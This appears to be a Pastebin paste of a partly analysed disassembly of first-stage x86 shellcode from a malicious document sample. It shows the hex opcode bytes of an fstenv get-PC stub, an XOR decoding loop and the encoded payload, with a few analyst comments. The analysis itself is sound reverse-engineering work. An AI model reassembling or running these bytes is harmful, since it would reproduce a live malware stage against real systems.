API tools faq
paste
Advertisement
Madmouse

semi analyzed stage 1 shellcode for doc sample

Madmouse
Aug 11th, 2015
265
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 6.73 KB | None | 0 0
raw download clone embed print report
  1. 00000000  43                inc ebx
  2. 00000001  49                dec ecx
  3. 00000002  42                inc edx
  4. 00000003  46                inc esi
  5. 00000004  47                inc edi
  6. 00000005  42                inc edx
  7. 00000006  43                inc ebx
  8. 00000007  48                dec eax
  9. 00000008  4F                dec edi
  10. 00000009  48                dec eax
  11. 0000000A  4B                dec ebx
  12. 0000000B  4E                dec esi
  13. 0000000C  41                inc ecx
  14. 0000000D  43                inc ebx
  15. 0000000E  4E                dec esi
  16. 0000000F  4F                dec edi
  17. 00000010  4A                dec edx
  18. 00000011  48                dec eax
  19. 00000012  4A                dec edx
  20. 00000013  4A                dec edx
  21. 00000014  4A                dec edx
  22. 00000015  47                inc edi
  23. 00000016  4B                dec ebx
  24. 00000017  47                inc edi
  25. 00000018  47                inc edi
  26. 00000019  42                inc edx
  27. 0000001A  42                inc edx
  28. 0000001B  42                inc edx
  29. 0000001C  43                inc ebx
  30. 0000001D  43                inc ebx
  31. 0000001E  47                inc edi
  32. 0000001F  4A                dec edx
  33. 00000020  43                inc ebx
  34. 00000021  47                inc edi
  35. 00000022  4A                dec edx
  36. 00000023  48                dec eax
  37. 00000024  48                dec eax
  38. 00000025  4F                dec edi
  39. 00000026  49                dec ecx
  40. 00000027  43                inc ebx
  41. 00000028  42                inc edx
  42. 00000029  42                inc edx
  43. 0000002A  47                inc edi
  44. 0000002B  4E                dec esi
  45. 0000002C  48                dec eax
  46. 0000002D  42                inc edx
  47. 0000002E  D9EE              fldz
  48. 00000030  6681EF4BA9        sub di,0xa94b
  49. 00000035  6681CF72CB        or di,0xcb72
  50. 0000003A  81EED99C5940      sub esi,0x40599cd9
  51. 00000040  9BD97424F4        fstenv [esp-0xc]
  52. 00000045  6681EEA84B        sub si,0x4ba8
  53. 0000004A  83E766            and edi,byte +0x66
  54. 0000004D  66BFD341          mov di,0x41d3
  55. 00000051  8B0C24            mov ecx,[esp]
  56. 00000054  6681F729BE        xor di,0xbe29
  57. 00000059  6681F669C2        xor si,0xc269
  58. 0000005E  83ECFF            sub esp,byte -0x1
  59. 00000061  4E                dec esi
  60. 00000062  83C402            add esp,byte +0x2
  61. 00000065  6601FE            add si,di
  62. 00000068  44                inc esp
  63. 00000069  81C611B15949      add esi,0x4959b111
  64. 0000006F  6681EEA84B        sub si,0x4ba8
  65. 00000074  81C1C2000000      add ecx,0xc2
  66. 0000007A  6681EE5A44        sub si,0x445a
  67. 0000007F  31C0              xor eax,eax
  68. 00000081  8D742420          lea esi,[esp+0x20]
  69. 00000085  058AFEFFFF        add eax,0xfffffe8a
  70. 0000008A  BFAEAF3A6C        mov edi,0x6c3aafae
  71. 0000008F  F7D8              neg eax
  72. 00000091  29FE              sub esi,edi
  73. 00000093  29D2              sub edx,edx
  74. 00000095  6689FF            mov di,di
  75. 00000098  30FF              xor bh,bh
  76. 0000009A  80CF5E            or bh,0x5e
  77. 0000009D  6601F7            add di,si
  78. 000000A0  81EED99C5940      sub esi,0x40599cd9
  79. 000000A6  8A19              mov bl,[ecx]
  80. 000000A8  C1E6A2            shl esi,byte 0xa2
  81. 000000AB  C1EFEA            shr edi,byte 0xea
  82. 000000AE  30FB              xor bl,bh
  83. 000000B0  47                inc edi
  84. 000000B1  F6C301            test bl,0x1
  85. 000000B4  7515              jnz 0xcb
  86. 000000B6  81EF129A95A3      sub edi,0xa3959a12
  87. 000000BC  80EBFF            sub bl,0xff
  88. 000000BF  66BF7E92          mov di,0x927e
  89. 000000C3  EB12              jmp short 0xd7
  90. 000000C5  81EE9FC8896D      sub esi,0x6d89c89f
  91. 000000CB  81EF60C7B01D      sub edi,0x1db0c760
  92. 000000D1  FECB              dec bl
  93. 000000D3  66C1E773          shl di,byte 0x73
  94. 000000D7  66C1EE26          shr si,byte 0x26
  95. 000000DB  8819              mov [ecx],bl
  96. 000000DD  6689F7            mov di,si
  97. 000000E0  83EAFF            sub edx,byte -0x1
  98. 000000E3  47                inc edi
  99. 000000E4  83C101            add ecx,byte +0x1
  100. 000000E7  BE82AC2B86        mov esi,0x862bac82
  101. 000000EC  39C2              cmp edx,eax
  102. 000000EE  75B0              jnz 0xa0
  103. 000000F0  6E                outsb
  104. 000000F1  96                xchg eax,esi
  105. 000000F2  3BD4              cmp edx,esp
  106. 000000F4  2E6F              cs outsd
  107. 000000F6  D429              aam 0x29
  108. 000000F8  53                push ebx
  109. 000000F9  D429              aam 0x29
  110. 000000FB  43                inc ebx
  111. 000000FC  D431              aam 0x31
  112. 000000FE  57                push edi
  113. 000000FF  D419              aam 0x19
  114. 00000101  7FD4              jg 0xd7
  115. 00000103  69396617472A      imul edi,[ecx],dword 0x2a471766
  116. 00000109  AD                lodsd
  117. 0000010A  D41A              aam 0x1a
  118. 0000010C  63D4              arpl sp,dx
  119. 0000010E  0B5A27            or ebx,[edx+0x27]
  120. 00000111  5E                pop esi
  121. 00000112  B5D4              mov ch,0xd4
  122. 00000114  2D7F5EB16E        sub eax,0x6eb15e7f
  123. 00000119  96                xchg eax,esi
  124. 0000011A  1E                push ds
  125. 0000011B  F25E              repne pop esi
  126. 0000011D  B7D4              mov bh,0xd4
  127. 0000011F  47                inc edi
  128. 00000120  7407              jz 0x129
  129. 00000122  5B                pop ebx
  130. 00000123  DEA4BA7F82A02A    fisub word [edx+edi*4+0x2aa0827f]
  131. 0000012A  B016              mov al,0x16
  132. 0000012C  D405              aam 0x5
  133. 0000012E  7B5E              jpo 0x18e           ; jmp to the middle of an instruction further down,MAYBE, it depends on whether it is ever taken
  134. 00000130  B439              mov ah,0x39
  135. 00000132  D453              aam 0x53
  136. 00000134  14D4              adc al,0xd4
  137. 00000136  05435EB45C        add eax,0x5cb45e43
  138. 0000013B  73D4              jnc 0x111
  139. 0000013D  0A0A              or cl,[edx]
  140. 0000013F  6E                outsb
  141. 00000140  8439              test [ecx],bh
  142. 00000142  DE94A0501C3557    ficom word [eax+0x57351c50]
  143. 00000149  0CD4              or al,0xd4
  144. 0000014B  1B7B57            sbb edi,[ebx+0x57]
  145. 0000014E  A08FDA9F2A        mov al,[0x2a9fda8f]
  146. 00000153  B2E7              mov dl,0xe7
  147. 00000155  1A1A              sbb bl,[edx]
  148. 00000157  3030              xor [eax],dh
  149. 00000159  D6                salc
  150. 0000015A  80F02A            xor al,0x2a
  151. 0000015D  B7F0              mov bh,0xf0
  152. 0000015F  2ABADE60FDFD      sub bh,[edx-0x2029f22]
  153. 00000165  8A8A2A870908      mov cl,[edx+0x809872a]
  154. 0000016B  0CD6              or al,0xd6
  155. 0000016D  A1DCB157E6        mov eax,[0xe657b1dc]
  156. 00000172  103E              adc [esi],bh
  157. 00000174  5B                pop ebx
  158. 00000175  5F                pop edi
  159. 00000176  E79A              out 0x9a,eax
  160. 00000178  C243DE            ret 0xde43
  161.  
  162.  
  163.  
  164. ; PART 2, jmp to middle of instruction
  165. 00000000  872A              xchg ebp,[edx]
  166. 00000002  EF                out dx,eax
  167. 00000003  DC985B06086E      fcomp qword [eax+0x6e08065b]
  168. 00000009  96                xchg eax,esi
  169. 0000000A  E9A5E11C3E        jmp dword 0x3e1ce1b4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!